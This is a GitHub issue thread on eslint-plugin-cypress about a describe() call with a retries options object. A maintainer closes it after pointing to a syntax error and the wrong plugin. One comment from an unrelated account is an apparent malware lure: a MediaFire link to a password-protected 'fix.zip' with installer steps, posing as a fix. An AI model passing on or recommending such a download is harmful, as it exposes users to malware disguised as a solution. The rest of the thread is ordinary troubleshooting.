### ISSUE TITLE
Enforce valid describe() callback (valid-describe-callback)

### ISSUE THREAD

**Issue by julianCast** [cypress-io/eslint-plugin-cypress#220]
### Current behavior
According to Cypress doc [docs.cypress.io/guides/guides/test-retries#Test-Suites](https://docs.cypress.io/guides/guides/test-retries#Test-Suites) we can pass a object as second parameter to Describe, for example to use retries.

According to jest we shouldn't [jest-community/eslint-plugin-jest@v28.6.0/docs/rules/valid-describe-callback.md](https://github.com/jest-community/eslint-plugin-jest/blob/v28.6.0/docs/rules/valid-describe-callback.md?rgh-link-date=2024-08-23T11%3A49%3A44Z)

### Desired behavior
Not getting a ESlint error from eslint-plugin-jest

### Test code to reproduce
```ts
describe(
  "Test1",
  {
    retries: {
      runMode: 2,
      openMode: 1,
    },
  },
  () => {}}
```
### Cypress Version
13.13.2

### Node version
20

### Operating System
macOS

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MikeMcC399** [comment]
@julianCast 

- As commented in https://github.com/cypress-io/cypress/issues/30092 this is not the right place for issues using https://github.com/jest-community/eslint-plugin-jest
- If you are using Jest and Cypress in the same repo, then you should avoid linting your Cypress test specs with Jest and lint them with the Cypress linter instead.

**Comment by MikeMcC399** [comment]
@julianCast 

Your test code fails linting since it should have a round closing bracket.

```js
describe(
  "Test1",
  {
    retries: {
      runMode: 2,
      openMode: 1,
    },
  },
  () => {}}
```

```text
  9:11  error  Parsing error: Unexpected token }

✖ 1 problem (1 error, 0 warnings)
```

Once this error is corrected it passes linting with `eslint-plugin-cypress`.

**Comment by MikeMcC399** [comment]
Closing, as there is no issue with `eslint-plugin-cypress`.

**Comment by julianCast** [comment]
Thank you, I will try with `eslint-plugin-cypress`
